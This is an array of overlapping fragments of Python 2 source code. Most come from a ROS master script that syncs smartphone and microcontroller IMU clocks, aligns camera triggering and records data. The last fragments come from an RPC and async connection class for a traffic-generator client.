"print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data,",
"= None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs /",
"mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA')",
"some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts",
"header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({",
"str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to",
"subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list]",
"data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu,",
"mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\"",
": M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv')",
"stop recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10)",
"print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with",
"msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source",
"subpr in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait()",
"_, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get data from mcu",
"= args[1] # Register SIGINT handler def signal_handler(sig, frame): print_master('Exiting') running_subpr_list = []",
"subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if remote is not",
"Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some",
"is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') #",
"np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener =",
"[] depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None remote = None",
"is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if",
"OKBLUE = '\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL",
"== None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past ==",
"Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of",
"M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2],",
"TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0",
"'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' :",
"\"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\",",
"M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1],",
"rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration =",
"for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t,",
"(sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to visually oversee",
"#rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished')",
"= rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command",
"signal_handler) # Starting smartphone remote control global remote remote = RemoteControl(HOST) # Launching",
"== \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref =",
"time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering",
"= sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp",
"mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record",
"True: input = select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if",
"running_subpr_list] if remote is not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT,",
"mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain",
"via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to",
"subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess =",
"mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1: print 'Please, provide smartphone",
"np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first measurement # Get data",
"sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y',",
"print_master_error(string): print(bcolors.BOLD + bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list",
"from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias in addition",
"+ bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD",
"CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu",
"sys import select import os HOST = None # The smartphone's IP address",
"print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with everything and exit') publisher_indicator",
"remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global",
"comp_delay2) # Show mean of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time,",
"if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in",
"\\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data,",
"plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback)",
"sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\")",
"'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2'",
"provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] #",
"time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _,",
"sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns /",
"'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time = []",
"sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time = sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths",
"if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq",
"print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference()",
"instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] # Register SIGINT handler def",
"mcu via mcu.cpp cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed",
"CameraInfo, TimeReference import numpy as np import pandas as pd from io import",
"== 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg",
"Show the problem of the first measurement # Get data from s10 imu",
"= rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is",
"publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait()",
"= 4 end_duration = 4 # Wait to avoid shaking time.sleep(1) # Gathering",
"= None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs",
"if remote is not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler)",
"its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts",
"input: value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1.",
"executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration +",
"sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 =",
"TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data",
"np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2.",
"time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister()",
"gathering finished') # Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0)",
"global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if",
"time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10) global depth_cam_ts global mcu_cam_ts time_sleep_duration =",
"= pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' :",
"= '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE:",
"RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu,",
"mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get data",
"signal import sys import select import os HOST = None # The smartphone's",
"Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0] if input: value =",
"sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \", comp_delay2 print",
"== 1: global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12:",
"- mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show",
"+ bcolors.FAIL + 'MASTER ERROR: ' + string + bcolors.ENDC) subpr_list = []",
"try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control",
"axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\",",
"mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs",
"camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) #",
"remote = RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection",
"if input: value = sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) #",
"= np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first measurement # Get",
") ''' # Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) )",
"# Starting smartphone remote control global remote remote = RemoteControl(HOST) # Launching ROS",
"sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get data from mcu imu",
"from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy() sm_gyro_time",
"1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts =",
"import pandas as pd from io import StringIO from src.TimeSync import TimeSync2 import",
"(path, 'debug_data.csv') ), index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess",
"cam_align_subprocess = subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a",
"subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a camera frame",
"''' # Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path)",
"'M02' : M[0,2], 'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20'",
"exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1",
"import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as plt import signal import sys",
"subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while True: print_master('Tap Enter to",
"+ str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess)",
"print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string):",
"dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts = data.header.stamp",
"\"sm_gyro_time[-1] \", sm_gyro_time[-1] print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\"",
"\" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to get camrera frame data",
"input = select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value",
"input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id =",
"'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1]",
"print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01);",
"np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) #",
"io import StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import",
"None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote",
"= sm_df.iloc[1:, 3].to_numpy() / 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data,",
"'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01' : M[0,1], 'M02' : M[0,2], 'M10'",
"= sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts -",
"= '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string):",
"print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time',",
"IP address class bcolors: HEADER = '\\033[95m' OKBLUE = '\\033[94m' OKCYAN = '\\033[96m'",
"OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC",
"time needed to get camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp",
"= pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1),",
"recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts =",
"sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp =",
"avoid shaking time.sleep(1) # Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as",
"), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame =",
"#debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client",
"print \"mcu_gyro_time[0] \", mcu_gyro_time[0] print \"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") +",
"addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem of the first measurement",
"sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print",
"+ ',' + str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for debugging",
"= mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current",
"None def mcu_imu_callback(data): dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat =",
"Enter to start recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns =",
"with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\",
"= subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time needed to",
"time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close()",
"#debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts'",
"1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global HOST HOST",
"not None: try: remote.stop_video() except: pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone",
"Twist-n-Sync start_duration = 1 main_duration = 4 end_duration = 4 # Wait to",
"= subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess",
"has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration",
"= [p.wait() for p in running_subpr_list] if remote is not None: try: remote.stop_video()",
"global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts == None or",
"= '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD =",
"data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with",
"/ 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts",
"+ str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister()",
"not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if remote",
"(value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref",
"depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts =",
"sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset",
"rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via mcu.cpp cam_align_subprocess =",
"time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2",
"#print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0]",
"sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] - mcu_gyro_time[0] +",
"publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current",
"0.01 time_past = 0 while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration)",
"False or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait()",
"import select import os HOST = None # The smartphone's IP address class",
"Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0] if",
"depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start video on s10",
"pass remote.close() sys.exit() signal.signal(signal.SIGINT, signal_handler) # Starting smartphone remote control global remote remote",
"p in running_subpr_list] if remote is not None: try: remote.stop_video() except: pass remote.close()",
"sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z',",
"12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args):"
] |
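The fragments above are overlapping shingles of a single Python 2 ROS "master" script: it shakes a smartphone and an MCU-driven IMU together (Twist-n-Sync), estimates the clock offset between the two gyro streams, and uses that offset to phase-align the MCU camera trigger with the smartphone video. The offset math the shingles spell out is compact; the sketch below restates it in one place. It is a minimal reconstruction, not the verbatim script: the helper name compute_offsets is hypothetical, and comp_delay2 is assumed to be the sub-sample delay produced by TimeSync2 after a successful calibration (the shingles only show it being consumed).

import numpy as np

def compute_offsets(mcu_gyro_time, sm_gyro_time, comp_delay2, sm_remote_ts):
    # Hypothetical helper; mirrors the offset math shown in the fragments.
    # Equalize lengths, as the script does before running TimeSync2.
    mcu_t = np.asarray(mcu_gyro_time)
    sm_t = np.asarray(sm_gyro_time)
    n = min(mcu_t.shape[0], sm_t.shape[0])
    # Fragments: sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2
    sm_mcu_clock_offset = np.mean(sm_t[:n] - mcu_t[:n]) + comp_delay2
    # Fragments: mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset, i.e. the
    # smartphone's video start time expressed in MCU clock terms.
    mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset
    return sm_mcu_clock_offset, mcu_desired_ts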
[
"server self.port = port self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided",
"that connection to the server connection state object describes the connection to the",
"''' return self.async.barrier() def sync (self): ''' fully sync the client with the",
"api_sync_v2 is not present in v2.30 and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return",
"main thread to reconnect ''' # avoid any messages handling for the async",
"3 def __init__ (self, conn_info, logger, client): self.conn_info = conn_info self.logger = logger",
"provided by the server self.api_h = None def get_server (self): return self.server def",
"port=5050, virtual=False, client = None): self.server = server self.port = port self.rpc_link =",
"virtual=False, client = None): self.server = server self.port = port self.rpc_link = JsonRpcClient(self.server,",
"server on {0}:{1}\".format(self.conn_info['server'], self.conn_info['sync_port'])) rc = self.rpc.connect() if not rc: return rc #",
"connected or marked for disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT",
"self.conn_info['async_port'])) rc = self.async.connect() self.logger.post_cmd(rc) if not rc: return rc self.state = (self.CONNECTED,",
"self.conn_info = conn_info # init state self.state = (self.DISCONNECTED, None) def disconnect (self):",
"async thread self.async.set_as_zombie() # change state self.state = (self.MARK_FOR_DISCONNECT, cause) # if the",
"marked for disconnection ''' DISCONNECTED = 1 CONNECTED = 2 MARK_FOR_DISCONNECT = 3",
"self.state = (self.MARK_FOR_DISCONNECT, cause) # if the flag is on, a SIGINT will",
"rc # API sync V2 rc = self.rpc.transmit(\"api_sync_v2\", params = self.api_ver) self.logger.post_cmd(rc) if",
"''' # first disconnect if already connected if self.is_connected(): self.disconnect() # connect rc",
"self.async = CTRexAsyncClient(self.conn_info['server'], self.conn_info['async_port'], client) # save pointers self.conn_info = conn_info # init",
"''' try: self.rpc.disconnect() self.async.disconnect() finally: self.state = (self.DISCONNECTED, None) def connect (self): '''",
"server must be called after all the config was done ''' return self.async.barrier(baseline",
"the flag is on, a SIGINT will be sent to the main thread",
"valid and will require the main thread to reconnect ''' # avoid any",
"self.rpc_link = JsonRpcClient(self.server, self.port, client) # API handler provided by the server self.api_h",
"def connect (self): ''' connect to the server (two channels) ''' # first",
"return batch.invoke(retry = retry) class Connection(object): ''' Manages that connection to the server",
"channel from now on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to",
"if not rc: # api_sync_v2 is not present in v2.30 and older if",
"rc = self.rpc.connect() if not rc: return rc # API sync V2 rc",
"from now on self.rpc.api_h = rc.data()['api_h'] # connect async channel self.logger.pre_cmd(\"Connecting to publisher",
"and older if rc.errno() == JsonRpcErrNo.MethodNotSupported: return RC_ERR('Mismatch between client and server versions')",
"API classes self.api_ver = {'name': 'STL', 'major': 4, 'minor': 1} # low level",
"return self.state[1] ########## private ################ def __connect (self): ''' connect to the server",
